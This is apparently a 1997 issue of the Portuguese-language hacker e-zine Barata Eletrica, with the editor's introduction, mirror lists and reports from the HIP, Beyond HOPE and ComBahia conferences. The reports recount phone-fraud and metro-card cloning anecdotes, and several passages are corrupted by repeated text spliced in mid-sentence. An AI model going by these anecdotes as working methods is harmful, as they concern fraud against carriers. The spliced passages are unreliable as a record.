Barata Eletrica17:(BE17.TXT):11/12/1997 << Back To Barata Eletrica17

____ _ ______ _ _ _ | _ \ | | | ____| | | | (_) | |_) | __ _ _ __ __ _| |_ __ _ | |__ | | ___| |_ _ __ _ ___ __ _ | _ < / _` | '__/ _` | __/ _` | | __| | |/ _ \ __| '__| |/ __/ _` | | |_) | (_| | | | (_| | || (_| | | |____| | __/ |_| | | | (_| (_| | |____/ \__,_|_| \__,_|\__\__,_| |______|_|\___|\__|_| |_|\___\__,_| BARATA ELETRICA Introducao: Sao Paulo, 4/11/97 Bom, finalmente mais um fanzine.. Impressionante. Eu comecei essa coisa so pra quebrar um galho e agora ja chegou no 17a edicao. Acho que o negocio seria 17 e 18, dado o material que estou colocando.. Aconteceu muita coisa desde a ultima edicao do fanzine. Participei de alguns testes de selecao, mudei do lugar onde estava morando (e escapei de uma fritura por razoes politico-estudantis), nao arrumei um emprego, finalmente to^ na Pos, (uma das minhas grandes ambicoes), sem falar numa conferencia la na Bahia, cuja capital eu nao conhecia. Nao fui nas conferencias de fora, mas teve uma aqui dentro que valeu a pena e falo dela mais adiante. Sao Paulo finalmente esta tendo encontros de hackers, mas dada a incerteza do local, nao vou publicar no Barata. Mais tarde vou fazer uma pagina so de encontros hackers no Brasil. Por enquanto acho mais negocio escrever sobre como "segurar a lingua", ja que notei que a maioria dos caras que conheco no Brasil e' extremamente vulneravel a varios tipos de interrogatorios e merecem muito mais nao saber nada, ja que nao sabem guardar um segredo. Ouvi umas historias de perseguicao por ai que achava ser coisa do tempo da ditadura. Falando nisso, resolvi desencavar um outro assunto, que nao tem tanto a ver com hacking, mas com a serie: "Batalha pela Mente". No fundo tem informacao que pode ser de interesse para o fussador comum, afinal de contas, quantas pessoas se dao conta de que o cerebro e' um computador passivel de ser programado? E o que e' pior, com o cerebro, nao tem essa de reformatar nao. Alias ate tem, mas nunca mais vai funcionar igual... Pensando nisso, resolvi colocar um texto da Opus Night. Tenho uma vaga ideia do autor e do tempo que ele levou para produzir essa obra prima (acho que uns 20 minutos). O problema e' que aqui na USP, existe um tal de ser chamado pra bate-papos biblicos e e' sempre a mesma coisa: sempre e' uma pessoa do mesmo sexo que aborda. Tento ser educado com todo mundo, uns truques que aprendi foi falar que e' da umbanda, que e' aidetico, montes de coisas. Eu costumava falar que era discipulo de Tantra. Que que isso? "Ah, e o uso do sexo para: (dois pontos) atraves do orgasmo (virgula) alcancar a comunicacao com Deus (ponto)". Era interessante ver a transformacao no rosto da pessoa, aquele esforco de auto-controle. Chato e' que se voce aceita o convite pro batepapo, sao piores que carrapato, apesar de educados. Nos EUA ja existe esse tipo de coisa, texto escrachando com a religiao. E chamado de Slack. Sim, tem a ver com Slackware.. A religiao Slack e' feita sob medida pro programador que quer acreditar em algo. Eu nunca consegui ler muito sobre isso, mas um dos lemas da religiao Slack e: "Salvacao Garantida ou o triplo do seu dinheiro de volta!". Um texto deles e: "Como encontrei a divindade e as coisas que fiz com ela". Mais informacoes, procura no Yahoo, Lycos, etc, etc... Outro texto que achei interessante foi e' aquele texto humoristico sobre o futuro de gente como a gente.. (Exu Tranca Rede) os unicos a realmente entender de informatica vao ser os que hoje ocupam posicao semelhante a de office-boys.. achei engracado, mas o^ futuro... Coisa ruim tambem o que esta acontecendo com o Kevin Mitnick. Eu realmente nao queria estar na pele dele. E depois riem da minha preocupacao em nao escrever nada serio. Pelo menos eu posso dormir mais ou menos tranquilo. A imprensa dita "comum" dificilmente faz alguma coisa. Como dificilmente faz alguma coisa pelo Sergio Fleury Morais. Nunca ouviram falar? Ele e' o dono do Jornal "O debate". Ficou em cana um tempao simplesmente porque editou algumas noticias e o juiz local nao gostou. Botou o cara literalmente em cana. Minha ultima noticia e' que ele tava tentando levantar uma grana gigantesca pra nao perder o jornal. Eu ja tive vontade de processar gente, alias, ja processei. So nao acho que nesse caso o cara teve algo justo. No caso do Kevin igualmente. Julgamento justo e' um direito de todos. Pelo menos deveria ser. Li na revista VEJA, que o Ministro da Justica, ╓ris Rezende tambem disse: "O Crime, as vezes, e' inevitavel". Varias pessoas escreveram me dando a maior forca no meu atual problema quanto a emprego e agradeco a preocupacao. Ainda nao achei nada. Mas tambem nao procurei muito. Algumas vezes acontece da pessoa falar que vai me ajudar, quer ver meu curriculo, nao sei o que e no final era apenas uma promessa pra conseguir uma atencao maior ou informacoes sobre a minha vida. Por essas e outras, resolvi investir em formacao academica e entrei na Pos. Li tudo quanto e' livro sobre Jornalismo (quase uns 12 dos 17 da bibliografia minima), mas N╟O me deixaram fazer Pos em Jornalismo. Queriam nota 7.0 e eu tirei 5.0. Tudo bem. Nao vou levar pro lado pessoal. Qualquer dia vao fazer uma tese sobre imprensa alternativa ou pior, sobre o Jornalismo na Web. Nao vao poder dizer que minha formacao foi culpa da Escola de Comunicacao e Artes da USP. Bom, vou parando por aqui. Se tudo funcionar legal, outro numero do Fanzine deve vir. Quem sabe, ainda este ano. Boa leitura. ╓NDICE: Introducao Sites do Barata Eletrica, Creditos, etc.. Conferencias Hacker no Mundo Com.BAHIA: uma conferencia Cyber Virus de Macro - o que e, o que faz, etc.. Batalha Pela Mente: Lavagem Cerebral Campanha Pelo Mitnick Opus Night - Uma Slack-Alternativa Religiosa Exu Tranca Rede Regulamento Para Salvaguarda de Assuntos Sigilosos Quem conta seus Segredos... News - Dicas - Humor - Sei la o que mais.. Bibliografia (acho que vou deixar de fora, ta tudo espalhado no texto) Creditos: Este Fanzine foi escrito por Derneval R. R. da Cunha (barataeletrica@thepentagon.com http://barata-eletrica.home.ml.org). Com as devidas excecoes, toda a redacao e' minha. Esta' liberada a copia (obvio) em formato eletronico, mas se trechos forem usados em outras publicacoes, por favor incluam de onde tiraram e quem escreveu. DISTRIBUICAO LIBERADA PARA TODOS, desde que mantido o copyright e a gratuidade. O E- zine e' gratis e nao pode ser vendido (senao vou querer minha parte). Nao sou a favor de qualquer coisa que implique em quebrar a lei. O material presente no fanzine esta com o fim de informar. Cada pessoa e' responsavel pelo seus atos. Para contatos (mas nao para receber o e-zine) escrevam para: barataeletrica@ThePentagon.com <-- provavelmente minha conta definitiva curupira@2600.com <-- minha mais nova conta rodrigde@usp.br <- ainda nao cancelaram, quem sabe este semestre... wu100@fen.baynet.de <- voltou a funcionar... nao sei por quanto tempo... Correio comum: Caixa Postal 4502 CEP 01061-970 Sao Paulo - SP BRAZIL Numeros anteriores: ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica gopher://gopher.eff.org/11/Publications/CuD/Barata_Eletrica http://www.eff.org/pub/Publications/CuD/Barata_Eletrica ftp://etext.archive.umich.edu/pub/Zines/BerataElectrica gopher://gopher.etext.org/00/Zines/BerataElectrica (contem ate' o numero 8 e e' assim mesmo que se escreve, erro deles) ATENCAO - ATENCAO - ATENCAO (Devido talvez ao uso de uma sacanagem da Geocities, talvez expirou o tempo, sei la, a home page do fanzine sera estocada aleatoriamente por ai, os sites abaixo nao mudam) Web Page do Fanzine Barata Eletrica: http://barata-eletrica.home.ml.org http://barataeletrica.home.ml.org www.thepentagon.com/barataeletrica Contem arquivos interessantes. ATENCAO - ATENCAO - ATENCAO ENDERECOS NO BRASIL: http://www.inf.ufsc.br/barata/ (site principal) http://www.di.ufpe.br/~wjqs http://www.telecom.uff.br/~buick/fim.html http://tubarao.lsee.fee.unicamp.br/personal/barata.html ftp://ftp.ufba.br/pub/barata_eletrica FTP://ftp.unicamp.br/pub/ezines/be (Mais novo site, hip, hip, hurra!) Sites de espelho no Brasil (OBS: se voce quiser que seu site apareca e' bom ele nao guardar propaganda nem de provedor) Peco desculpa para aqueles que ainda www.thepentagon.com/barataeletrica Contem arquivos interessantes. ATENCAO - ATENCAO - ATENCAO ENDERECOS NO BRASIL: http://www.inf.ufsc.br/barata/ (site principal) http://www.di.ufpe.br/~wjqs http://www.telecom.uff.br/~buick/fim.html http://tubarao.lsee.fee.unicamp.br/personal/barata.html ftp://ftp.ufba.br/pub/barata_eletrica nao coloquei aqui.Voces nao imaginam o trabalho para fazer isso em html.. podia pedir para alguem, mas nao curto a ideia. Ou da problema ou sei la.. desisti. Os sites espelho sao os primeiros a receber o fanzine. Mande carta para rato.cpd@digicron.com com o subject: mirror-barata eletrica . Sites na Geocities (pode deixar que eu faco) ou contendo versoes html nao autorizadas nao entram na lista. (Normalmente, sao os primeiros a receber o zine) MIRRORS - da Electronic Frontier Foundation onde se pode achar o BE UNITED STATES: etext.archive.umich.edu in /pub/CuD/Barata_Eletrica ftp.eff.org in /pub/Publications/CuD/Barata_Eletrica aql.gatech.edu in /pub/eff/cud/Barata_Eletrica world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica uceng.uc.edu in /pub/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica wuarchive.wustl.edu in /doc/EFF/Publications/CuD/Barata_Eletrica EUROPE: nic.funet.fi in /pub/doc/cud/Barata_Eletrica (Finland) (or /mirror/ftp.eff.org/pub/Publications/CuD/Barata_Eletrica) ftp.warwick.ac.uk in /pub/cud/Barata_Eletrica (United Kingdom) JAPAN: ftp.glocom.ac.jp in /mirror/ftp.eff.org/Publications/CuD/Barata_Eletrica www.rcac.tdi.co.jp in /pub/mirror/CuD/Barata_Eletrica OBS: Para quem nao esta' acostumado com arquivos de extensao .gz: Na hora de fazer o ftp, digite binary + enter, depois digite o nome do arquivo sem a extensao .gz Existe um descompactador no ftp.unicamp.br, oak.oakland.edu ou em qualquer mirror da Simtel, no subdiretorio: /SimTel/msdos/compress/gzip124.zip to expand it before you can use it. Uma vez descompactado o arquivo GZIP.EXE, a sintaxe seria: "A>gzip -d arquivo.gz No caso, voce teria que trazer os arquivos be.??.gz para o ambiente DOS com o nome alterado para algo parecido com be??.gz, para isso funcionar. ULTIMO RECURSO, para quem nao conseguir acessar a Internet de forma direta, mande carta (nao exagere, o pessoal e' gente fina, mas nao e' escravo, nao esquecam aqueles encantamentos como "please" , "por favor" e "obrigado"): fb2net@netville.com.br hoffmeister@conex.com.br drren@conex.com.br wjqs@di.ufpe.br aessilva@carpa.ciagri.usp.br dms@embratel.net.br clevers@music.pucrs.br rgurgel@eabdf.br patrick@summer.com.br ASSINATURA DO BARATA ELETRICA VIA CORREIO ELETRONICO Para receber o fanzine via email, mesmo quando podendo pegar ele na rede. Estou montando um esquema no qual a pessoa envia email para: rato.cpd@digicron.com com os seguintes dizeres, no corpo da carta: assinatura BE seu-email@fulano.xxxx.xx entendendo claro que seu email e' seu e-mail, nao a string seu-email. Isso porque nao vou ler a correspondencia. Qualquer coisa alem disso sera' ignorada. Como mesmo assim vou precisar de gente para me ajudar a distribuir, as pessoas que tiverem boa vontade tambem podem participar, enviando email para o mesmo endereco eletronico com o subject: ajuda BE seu-email@fulano.xxx.xx Provavelmente nao havera' resposta, ja' que e' um acochambramento que to planejando. A cada novo numero, vou sortear os voluntarios que irao receber primeiro e depois vao distribuir para os preguicosos ou distraidos ou superocupados que querem receber o lance sem fazer ftp ou usar WWW. Mas aviso: sera' feita a distribuicao em formato uuencodado. Aprendam a usar o uudecode. E nao ha' garantia que a coisa vai funcionar. A assinatura comeca a partir do numero seguinte. OBSERVACAO: Tem muita gente que esta' enviando carta so' com assinatura no conteudo e mais nada. As pessoas que nao seguirem as instrucoes acima a risca perigam nao receber. Agradeco ao enorme numero de voluntarios p. distribuicao. aviso automatico quando novo numero do Barata Eletrica chegar.. Procurar no http://www.inf.ufsc.br/barata ou no http://barata-eletrica.home.ml.org pelo arquivo ultimo.html CREDITOS II : Sem palavras para agradecer ao pessoal que se ofereceu para ajudar na distribuicao do E- zine, como os voluntarios acima citados, e outros, como o sluz@ufba.br (Sergio do ftp.ufba.br), o delucca do www.inf.ufsc.br, o Queiroz da Unicamp (a USP nao gosta de mim, mas a Unicamp gosta...:-), o Wagner, o Manoel, o Buick. E gente que confia em mim, espero nunca atrapalhar a vida deles com isso. Igualmente para todos os que me fazem o favor de ajudar a divulgar o Barata em todas as BBSes pelo Brasil afora. AGRADECO TAMBEM AOS QUE QUEREM ME AJUDAR, "HOSPEDANDO" O EZINE EM SUAS PAGINAS OU FTP-SITES. A PARTIR DO PROXIMO BE, (Aham!... pode demorar mais do que o proximo numero do BE) COMECO A COLOCAR OS URLS DESDE QUE NAO HAJA UM LANCE COMERCIAL (nao quero meu Fanzine com propaganda de qualquer especie, nem do provedor) OBSERVACAO: Alguns mails colocados eu coloquei sem o username (praticamente a maioria) por levar em conta que nem todo mundo quer passar por colaborador do BE. Aqueles que quiserem assumir a carta, mandem um mail para mim e numa proxima edicao eu coloco. CONFERENCIAS DE HACKERS NO MUNDO Uma Amostra do H.I.P. torquie@landslide.openix.com (traduzido por Derneval, publicado com permissao) (fotos copiadas de http://yoda.simplenet.com/day1.html) De todos os congressos em que fui (e estive em muitos), Hacking In Progress foi definitivamente o mais "cool" de todos e a mais surreal conferencia hacker ja feita. Isto foi definitivamente um evento Europeu, apesar de que alguns vieram dos EUA. A atmosfera era carnaval. Foi como uma conferencia do velho estilo onde voce se juntava para encontrar com pessoas frente a frente, trocar ideias e basicamente fazer um monte. Por volta de 2500 pessoas vieram: hackers, artists, midia, policia... uma mistura total de culturas e ideias. HIP foi uma verdadeira festa de bicho-grilo. Os computadores ligados por network estavam dispostos ao longo do camping. Nas manhas do evento (quando eu dormia), acordava com os passarinhos cantando e windows95 dando boot. Nas tardes eu sentava ao lado da fogueira batendo papo enquanto o pessoal mais "hardcore" jogava DOOM e trocava warez. Durante o dia havia varias atividades. Uma tenda mantinha aulas sobre como abrir fechaduras. Noutra um grupo de astronomos arranjou telescopios ligados a equipamento de monitoracao de dados que voce poderia imprimir. Os cypherpunks tinham sua propria tenda armada e eu me enfiava la de vez em quando para um bate-papo e uma bebida gelada. Havia um link de videoconferencia com HOPE, mas deu pau e foi abandonada. Na marquise principal, havia palestra dentro do espectro de interesses de hackers: seguranca de computadores, as questoes legais da coisa, email anonimo, criptografia, etc.. O tempo estava literalmente fervendo e meu cerebro derretido estava encontrando dificuldades para concentracao. A maior parte do meu tempo eu passei fora na sombra dou na tenda, operando o bar, falando com gente individualmente em pequenos grupos. Os telefones publicos misteriosamente quebraram no domingo e so podiam ser usados para discar servicos de emergencia. Porem.. se voce discasse para o "disque-emergencia" holandes (911- pros americanos), a pessoa conseguia um tom de discar e ai podia ligar pra qualquer parte do mundo, de graca. Supostamente isto era um "erro de programacao" por parte da Companhia Holandesa de Telefones. Workshops mais interativas tambem eram mantidas. Embora as palestras tecnicas fossem realmente interessantes, meu evento favorito foi a Workshop Yo-Yo Padeluun's. Alem do fato de que eu consegui manter o yo-yo, a workshop em si foi uma "performance". Se voce conhece o background vai entender o que quero dizer, se nao ... Padeluun e' membro do grupo FOEBUD da Alemanha. Estas pessoas fazem projetos realmente brilhantes e sao muito engajadas politicamente. Um dos seus projetos foi montar networks durante a guerra na antiga Yugoslavia. Eles tambem trabalham para distribuir o PGP para grupos em paises com regimes de ditadura. Nao e' qualquer um que poderia arrumar uma workshop como essa. Esta e' a maior ironia. Quando eu cheguei la, a coisa ja tinha comecado e eu vim na fala "yo-yo e' bom para engenharia social, ninguem te acha ameacador quando voce brinca de yoyo". Levando em conta que o chefe da divisao de Crimes de Computador Holandesa estava na palestra, achei isso pr de que eu consegui manter o yo-yo, a workshop em si foi uma "performance". Se voce conhece o background vai entender o que quero dizer, se nao ... a la de engracado. A atitude do pessoal no HIP era realmente positiva. A definicao europeia de hacking tem sido sempre mais leve que a americana. Europeus aceitam a ideia de "social hacking". Nao hackear no sentido de hackear Unix, mas no sentido de subverter tecnologia, seja atraves de uma radio pirata, hackear smartcards, fazer engenharia social com os federais ... ou o que quer que seja. Ao contrario de algumas conferencias em que participei nos ultimos dois anos, a atmosfera do HIP era realmente madura. Nao havia jovens detonando qualquer coisa, nao havia o que inundar, nem ninguem armou os alarmes de incendio ou aleatoriamente destruiu algo so porque estava afim, e geralmente as pessoas que participaram tinham uma grande quantidade de respeito pelo evento e os organizadores. O que significa que ninguem que eu vi agiu como um babaca e ninguem esta controlando o evento de fora. Vendo de forma mais pessoal foi brilhante encontrar gente la e ouvir alguns dos projetos mais recentes que as pessoas estavam pondo em andamento. Desde a ultima vez que este evento rolou (HEU, 'Hacking at the End of the Universe' mantido no mesmo lugar em 1993), a cena hacker mudou. Uma diferenca que marcou direto e' que tinha tanta mulher quanto homem la. E dessa vez nao eram namoradas ou amigas de hackers mas mulheres que estao metendo a mao na tecnologia e usando em varios projetos. Felipe Rodrigues, que comecou a Hack-Tic junto com Rop Gonggrip tempos atras, no inicio da cena hacker holandesa, foi sempre ativo no front politico "Para nos, as coisas mudaram. Eles costumavam chamar a gente de criminosos e pensavam na gente como terroristas. Agora damos conselhos para o Ministerio da Justica. Nos somos os que conhecem a tecnologia aqui." Rodrigez tambem acredita que hacking e' uma ferramenta poderosa em paises como Peru ou Bolivia onde o estado e' injusto e os cidadoes precisam "se defender". Esta visao o fez inpopular com servicos secretos que consideram o antigo membro do zine Hack-Tic mais perigoso agora que eles tem poder na comunidade financeira na Holanda. Embora as coisas tenham mudado desde os primeiros dias de hacking, a cena Hacker europeia pode ter amadurecido de alguma forma "a cena hacker agora engloba bolsos de cultura. Ha a midia alternativa, a velha cultura hacker, os hackers de Unix, IRC, ate astronomos que estao na sua propria cultura de computador. E para todos os tipos de pessoa, razao pela qual chamamos de Hacking in Progress, nos progredimos". Resumindo, HIP foi fantastico. Foi brilhante ver a maioria das pessoas que tenho conhecido na cena europeia em um lugar e encontrar novas pessoas que eu definitivamente manterei contato nos proximos anos. Eu estou realmente esperando pelo proximo! Se voce quer fotos e artigos, da um look no HIP site em http://www.hip97.nl. BEYOND HOPE - O QUE ACONTECEU? Bom, como todo mundo que foi nas minhas paginas deve estar cansado de saber, eu Nao fui nem no Beyond Hope nem no HIP. E to^ me xingando ate agora por isso. Aconteceu muita porcaria de uma so vez. Desemprego, Pos e um pedido pra sair de onde eu morava. Como descobri que nenhum jornal ou revista ia bancar o papai noel e financiar minha ida em troca de uns artigos, desisti. Houve ate propostas (tipo: "voce vai, faz o que tiver que fazer, na volta a gente olha e se tiver alguma coisa que interessa, a gente paga o artigo") mas era muita complicacao. Melhor economizar minha grana. Enfim, o negocio e' re-escrever artigos de gente que foi la, como o resto da imprensa costuma fazer... A Beyond HOPE (Alem do Hacking On Planet Earth - se fosse traduzir) parece ter sido um evento bem legal. Garth Brooks, (nunca ouvi falar) fez um concerto na quinta feira "gratuito e somente para hackers" no Central Park. O encontro foi feito no salao de baile do edificio Puck, que foi convertido em CPD, com trocentos terminais de computadores interligados. Tinha ate uma lista de discussao, so para planejar essa coisa toda. Muita gente trouxe seus proprios micros para ligar na tomada e brincar de "break-in". Uma coisa interessante sao as pequenas historias do acontecimento. No encontro anterior, tinha havido uma tentativa do Servico Secreto americano de "acabar com a festa". Desta vez nao so nao houve como os caras da 2600 ficaram impressionados de poder estacionar o furgao da revista por dois dias seguidos sem um unico cartao de multa. Vai entender.. A galera que nao foi no HIP tava la, notadamente o Chris Googans, vulgo Erik Bloodaxe, da Phrack. Pela foto, o cara ta finalmente chegando aos 30 com cara de quem realmente esta com 30. A ultima vez que o vi ele ainda conseguia passar por um carinha esperando o exame pro servico militar. O Capt. Crunch, famoso por ser um dos que popularizaram o uso "gratuito" dos telefones publicos tambem estava la, mas na qualidade de mero "ouvinte". De acordo com o proprio, tava ali pra aprender com a mocada mais jovem. Realmente. Nesse tempo atual, tudo esta tao mudado que nem da pra ficar "por dentro". A historia do cara merece um livro, me lembro dela toda vez que me chamam pra colaborar numa materia de hacking. A revista "Esquire" fez uma materia que hoje se tornou antologica (classica, referencia) sobre o assunto Phreaking. Acontece que.. a empresa telefonica de la, vulgo Bell (Ma Bell para os intimos) nao curtiu muito a coisa.. curtiu menos ainda quando o sujeito foi trabalhar na entao Apple (entao recentemente fundada por Steven Jobs e um colega) e inventou um jeito de conectar o tal computador na linha telefonica. Sentiu o lance? E, o cara usou o dito para fazer war dialing e esgotou o papel que a telefonica tinha planejado para registrar "coisas estranhas" em linhas telefonica. Crunch foi preso uma ou duas vezes e ficou uns dois anos na cadeia. Virou um cara marcado a partir do momento em que seu nickname apareceu numa reportagem, simplesmente porque essa reportagem gerou uma onda de carinhas fazendo isso pelos EUA e o mundo afora. Isso sem falar que enquanto esteve preso, ensinou a fazer ligacoes "ilegais" para qualquer um que quisesse aprender. Assim salvou a pele, um pouco. Uma parte curiosa da historia, alias, duas. Ele ensinou o Steven Jobs e seu colega fundador da Apple a fazerem Blue Boxes. E os dois sairam por ai vendendo. Nao existia lei contra isso, so contra usar. Mas, voltando ao Crunch, ele saiu da prisao, fez o primeiro editor de texto "decente" para o novo e recem lancado IBM-PC. Virou milionario de software e perdeu tudo depois, nao conseguiu manter o pique. Um tempo atras tava tao ruim de vida, so tinha o carro e mais alguma coisa. Agora parece que estabilizou. Voltando ao lance, a cena estava nos conformes. Como era de se esperar, houve algumas coisas que "desapareceram", e apareceram alguns outros tipos interessantes, comentando coisas mais interessantes ainda, como por exemplo, uma discussao sobre como "hackear" o sistema de transporte de N.York, que alem de caro, foi totalmente refeito para evitar a zona que estava antes, com uso de cartoes falsificados e tudo. Enquanto alguns juravam que o novo ticket de metro^ e' uma especie de versao teste para o grande irmao (o ticket ja carregaria informacoes que permitem rastrear os passos da pessoa pelo metro), um sujeito com o pseudonimo de Mr. Balaklava comentava isso e que se duas pessoas usarem dois cartoes, um verdadeiro e outro "clone", os dois param de funcionar quando usados. Reza a lenda que um cara conseguiu entrar no metro, gravando um ruido campestre num 8 canais e depois usando a fita num cartao adulterado. Passou a catraca, mas foi preso. Vai saber.. os caras la estao doidos para descobrir alguma falha nesse tipo de catraca.. aqui no Brasil, o que sei e' que isso ja foi tentado. Ja se teve inclusive sucesso. Mas o metro^ mantem fiscais para observar quem usa cartao comum ou com alguma treta. Eu ja me senti observado. Se voce tem algum probleminha qualquer com o ticket de metro, imediatamente alguem vem ver o que que voce tentou fazer. Uma que rolou foi que o pessoal na conferencia tinha conseguido "craquear" os computadores do HIP, la na Holanda. Eles la, negaram que fosse o computador principal. Tudo depende de quem e outro "clone", os dois param de funcionar quando usados. Reza a lenda queum cara conseguiu entrar no metro, gravando um ruido campestre num 8 canais e depois usando a fita num cartao adulterado. Passou a catraca, mas foi preso. Vai saber.. os caras la estao doidos paacredita em quem. La falaram que nao, aqui falaram que sim.. o link de video-conferencia entre os dois deu pau. Vai saber entao.. tinha um link via codigo morse entre os dois sites (a pessoa apertava o botao ali, acendi a lâmpada la e vice-versa). O cara que teve essa ideia tem uma pagina que pode ser acessada na rede. A ideia e' que comunicacao nao depende de grandes transferencias de dados. Como de costume, havia gente vendendo camisetas para algum fundo qualquer. Uma, interessante: Silence my voice, I will find another. Make my voice a crime, I will create a new one." Phiber Optik deu uma palestra sobre um novo sistema digital de telefonia que esta rolando agora no inicio do ano. Teoricament mais seguro. Para quem foi preso "como um simbolo para a comunidade hacker", ate que ele continua "alive n' kicking". Goldstein deu uma palestra sobre Social Engineering excelente, pelo menos e' o que falam. A que eu vi na Argentina foi muuuuito legal. artigo baseado em reportagens do N. York Times, relatos na internet e revista 2600, algumas fotos sao recortes de outras fotos do evento. COMBAHIA - UMA CYBER CONFERENCIA Infelizmente nao pude ir nem ao HIP nem ao Beyond Hope. Mas em compensacao, tive uma chance de conhecer algo incrivel.. mas primeiro, saquem so a historia: o pessoal da Faculdade de Comunicacao da Universidade Federal da Bahia tem uma so tarefa para aquela turma X, aquele semestre: fazer uma conferencia pra ficar na historia. Convidar as maiores personalidades que tiveram ou tem algo pra falar do comeco, meio e estado atual da internet no Brasil num anfiteatro e lascar o verbo. Foi legal.. Primeiro, precisa falar que os caras nao estao nadando em grana. Segundo que nao foi obra dos professores organizar e chamar o pessoal. Foram os alunos do curso de Comunicacao que botaram a mao na massa, descolaram patrocinio com a Varig e outras empresas pra trazer o pessoal. Sim, porque ate teve gente de Salvador e da Bahia. Assim como teve tambem gente do Nordeste todo, incluso Alagoas, que pelo que a imprensa mostra na TV e nos jornais nao devia nem ter computador, quanto mais faculdade desenvolvendo coisa na Internet. E' , a Bahia tem um jeito.. Eu nao podia ir. Isso foi 3 ou 4 dias antes de duas provas que eu tinha. Mas ai olhei os nomes dos caras que iam. Tirando um cara que eu nao queria nem ver perto, tudo bem, era tudo gente grauda pacas. Nao e todo dia que sento com alguem de algum Ministerio. Nao e todo dia que tenho chance de falar para gente interessada em ouvir minhas historias. E no meio do caminho, tinha uma passagem de ida e volta. Pra Salvador. "Senhor, que faco eu com esta espada? Ergueu-a e fez-se" (Fernando Pessoa). E chegando la, vendo o nivel das conversas que rolaram, digo agora. Era pra ter ido de qualquer jeito. Ate se fosse a pe. Sem puxacao de saco. Os ouvintes na maioria eram uma grande parte, gente da faculdade de comunicacao. Tem internet na UFBA (uma das pioneiras, no Brasil, inclusive o primeiro ftp site brasileiro a hospedar o Barata Eletrica). Mas a coisa nao esta tao facil, quanto digamos, na USP. O pessoal la sua e nao e so com o calor. A Telebahia, responsavel pela primeira transmissao de TV via Web no Brasil (permitindo ao pessoal la fora assistir o Jornal Nacional e o Fantastico via computador) nao tem uma conexao legal com o resto do Brasil. Se tem, esta melhorando agora. O sistema telefonico la foi desenvolvido com uma tecnologia um pouco mais avancada (me falaram que permite usar Blue Box) e ate tem uma conexao internet boa, mas pra fora do Brasil. Nao para dentro. Nao posso falar isso muito, porque e muito raro eu acessar qualquer coisa no Brasil, a coisa pode ter mudado. O pessoal ficou sabendo de mim atraves do Andre Lemos, que tem uma lista chamada cibercultura. Ele escreveu uma vez numa revista sem mencionar o Barata Eletrica, eu escrevi uma carta indignado e conversa vai, conversa vem, fiquei sabendo que ele foi um dos brasileiros que viu de perto o Congresso de Hackers que teve na Holanda, cinco anos atras. Gente fina. Levou a serio o lance enquanto ainda era novidade no Brasil. Na epoca da conferencia estava com um projeto de "sala de aula virtual". Nao participei da coisa, mas parece que era um curso via correio eletronico e Chat, com um certificado. Totalmente via internet. O inicio das palestras foi feito pelo Reitor, que so disse uma unica frase que vale a pena ser lembrada: "A sala de aula e anacronica". Tendo trabalhado em Ensino via telematica, concordo com ele. O Andre Lemos e mais um pessoal na bancada disseram algumas palavras sobre o evento, a quantidade de tempo que cada um ia falar, etc, etc.. a mesma chatice de sempre. 14/10 - 15:00 - As midias e as possibilidades do futuro Primeiro falou um cara da Renpac, comentando uma serie de coisas sobre a Internet no Brasil, a evolucao da Internet-II. Gravei tudo, menos o nome da figura. Acho que foi Jose Luiz. Tava caindo de sono. O tipo de material que se pode ler aqui e ali' numa revista. Mas com direito de fazer perguntas pra pessoa, que e mais importante. Infelizmente o pessoal que organizou o congresso nao fez a transcricao do que rolou nem me mandou um resumo que disseram que iam mandar pra mim. Entao to quase escrevendo de memoria, mais o que gravei em k-7, mais o que dizia o folheto da Com.Bahia menos tudo o que esqueci depois de estudar pra duas provas de pos-graduacao e um concurso, coisa de uns 10 ou 11 livros. A conferencia seguinte foi da Marcia Rangel, que comentou alguns aspectos da avalanche de informacao pela qual passa o ser humano. Baita combustivel para pensamento. Quando voce imagina que uma grande parte da humanidade nao tem o que comer, no entanto voce passa de carro por uma favela e ve o a quantidade de antenas de TV, incluindo Parabolicas, existe uma fome por informacao. Tudo bem que essa informacao pode nao ser a mesma que a gente imagina, pode ser a loira do tcham. Mas e impressionante o avanco das parabolicas incluindo nas favelas. Sera que esse pessoal realmente aproveita toda a gama de canais internacionais que a channel TV proporciona? Por outro lado, sera que o pessoal digere essa informacao. Tudo que a pessoa capta, e transformado em atitude, em coisa util para a evolucao da pessoa humana? E a Dolly? Sera que toda essa polemica em torno da possibilidade de se duplicar uma ovelha nao e um sinal de que o ser humano pode estar sendo desvalorizado? Nao trouxe muitas conclus⌡es, mas foi uma palestra que marcou, pelo menos para mim. A outra palestra, a do Paulo Vaz, essa foi um pouco mais "insossa". O palestrante nao precisa ser brilhante, desde que o ouvinte seja sabio. O cara e brilhante, mas nao estava conseguindo desenvolver o assunto legal de forma que falasse a lingua do povo que estava la. Bem tipo tentar ler "Critica da Razao Pura". Quando conseguiu encontrar o vocabulario correto para a plateia, ja tinha esgotado o tempo. Mas o que consegui entender, quando a coisa ficou mais clara foi o seguinte: antes, a pessoa ia pra escola, estudava e tinha certeza de usar aquilo que estudou mais tarde. Atualmente, com o excesso de informacao disponivel, a coisa ficou um pouco diferente. Nao e so isso. O conceito de mundo esta se alterando muito rapido. Ate ai normal, todo mundo sabe. Mas o "tcham" da coisa e que o saber virou plastico. O que era antes algo passado as vezes de pai pra filho agora virou coisa de email. Aquele conhecimento que demorava anos pra pessoa "garimpar" virou coisa de algumas semanas na internet. E dai? Dai que o futuro e feito por nos e nossas expectativas em relacao a ele. O futuro vai ser aquilo que quisermos que ele seja. Nao vai ser o que o Bill Gates disse nem o que o qualquer profeta qualquer falar, mas o que a humanidade achar que deve fazer. Papo meio cabeca. O sujeito teve que terminar antes que desenvolvesse mais o assunto. Essa coisa de conhecimento "plastico" tem pra mim todo um outro significado. Uns dez ou vinte anos atras, li uma revista "proibida para menores" (vale a pena explicar que naquele tempo, o Brasil inteiro era proibido para menores de 18 anos - teve revistas que adquiriram status de publicacao de alto nivel. Isso porque a censura deixava passar algumas materias de alto nivel nessas publicac⌡es, alta filosofia e mulher pelada so saia em revista "proibida pra menores de 18"). Tinha uma materia sobre geralistas e especialistas. Parece incrivel eu falar de hacking e mencionar esse tipo de coisa, mas o fato e que o mundo ate entao, ate mesmo hoje, valoriza o cara que se especializa numa materia. O fulano que e PHD nisso ou Doutorado naquilo, aquele cara que sabe tudo sobre um determinado assunto. Geralista e o cara que nao se especializa em nada ou melhor, sabe muito sobre mais de uma especialidade. Havia estas duas categorias. Atualmente, o saber nao e 